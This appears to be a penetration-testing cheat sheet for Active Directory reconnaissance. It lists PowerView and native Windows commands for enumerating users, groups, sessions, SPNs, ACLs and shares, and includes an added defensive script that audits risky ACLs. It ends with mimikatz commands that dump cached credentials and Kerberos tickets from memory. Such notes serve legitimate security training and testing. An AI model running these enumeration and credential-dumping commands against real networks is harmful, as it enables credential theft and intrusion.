# Domain Recon

The following are tools and scripts that can be used to collect information about the domain.

## Basic Domain Info

```
#Using Powerview
Get-NetDomain
```

## List of Computers

```
#Using Powerview
Get-NetComputer
```

## List of Domain Users

```
net user /domain
```

## Domain User Attributes and Details

```
net user <username> /domain

#Using Powerview; the output can be filtered by piping to select with a property name (e.g. cn)
Get-NetUser
```

## Check User Admin Access

```
#Using Powerview
Find-LocalAdminAccess
```

## List of Domain Groups

```
net group /domain
```

## Domain Group Privileges

```
#Using Powerview
Get-NetGroup
```

## Domain Users to Domain Group Mapping

```
net group "<group name>" /domain

#Using Powerview
Get-NetGroup "<group_Name>" | select member
```

## List of Logged in Domain Users

```
#Using Powerview
Get-NetSession -ComputerName <hostname> -Verbose

#Using PsLoggedon
.\PsLoggedon.exe \\hostname
```

The above commands can be used to find the logged-in users on a remote machine, but for various reasons both commands could fail.

[PsLoggedon](https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon) is an executable made available by Microsoft to list the logged-on users on a remote system.

## List of SPNs in Domain

```
#Using Powerview
Get-NetUser -SPN | select samaccountname,serviceprincipalname

#Using setspn
setspn -L <user>
```

[Setspn](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241\(v=ws.11\)) is an executable made available by Microsoft to list the SPNs present in a domain.

## Get Object ACL

```
#Using Powerview
Get-ObjectAcl -Identity <obj name>

#Filtering down to Active Directory rights with the GenericAll permission
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
```
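As an added defender-side audit (not code from the original page or from PowerView), the following script uses the RSAT ActiveDirectory module to list ACEs that grant GenericAll-class rights on high-value groups to principals outside an expected admin set; the target group list and the expected-principal list are assumptions to adapt to your environment.

```powershell
# Added audit example (not from PowerView or the original page).
# Assumes the RSAT ActiveDirectory module is installed and the current user can read AD ACLs.
Import-Module ActiveDirectory

# Groups treated as high value (assumption; extend as needed)
$targets = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Schema Admins')

# Rights that allow taking over an object; WriteDacl/WriteOwner are as dangerous as GenericAll
$dangerous = 'GenericAll|WriteDacl|WriteOwner|GenericWrite'

# Principals expected to hold such rights (assumption: adjust to your environment)
$domainNetbios = (Get-ADDomain).NetBIOSName
$expected = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    "$domainNetbios\Domain Admins",
    "$domainNetbios\Enterprise Admins"
)

$findings = foreach ($name in $targets) {
    $group = Get-ADGroup -Identity $name -ErrorAction SilentlyContinue
    if (-not $group) { continue }

    # The AD: PSDrive is created when the ActiveDirectory module is imported
    $acl = Get-Acl -Path ("AD:\" + $group.DistinguishedName)

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.ActiveDirectoryRights.ToString() -notmatch $dangerous) { continue }

        $who = $ace.IdentityReference.Value
        if ($expected -contains $who) { continue }

        [pscustomobject]@{
            Group     = $name
            Principal = $who
            Rights    = $ace.ActiveDirectoryRights
            Inherited = $ace.IsInherited
        }
    }
}

# Each row is an ACE worth reviewing: an unexpected principal can modify a privileged group
$findings | Sort-Object Group, Principal | Format-Table -AutoSize
```

Inherited ACEs usually come from the container or domain head, so a finding with Inherited set to True points at the parent object's ACL rather than the group itself.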

## List Domain Shares

```
#Using Powerview
Find-DomainShare
```

## Cached AD Credentials

Credentials of users are usually cached on the host and can be retrieved using the mimikatz executable.

```
.\mimikatz.exe

#Within mimikatz
privilege::debug
sekurlsa::logonpasswords

#List the cached Kerberos tickets
sekurlsa::tickets
```
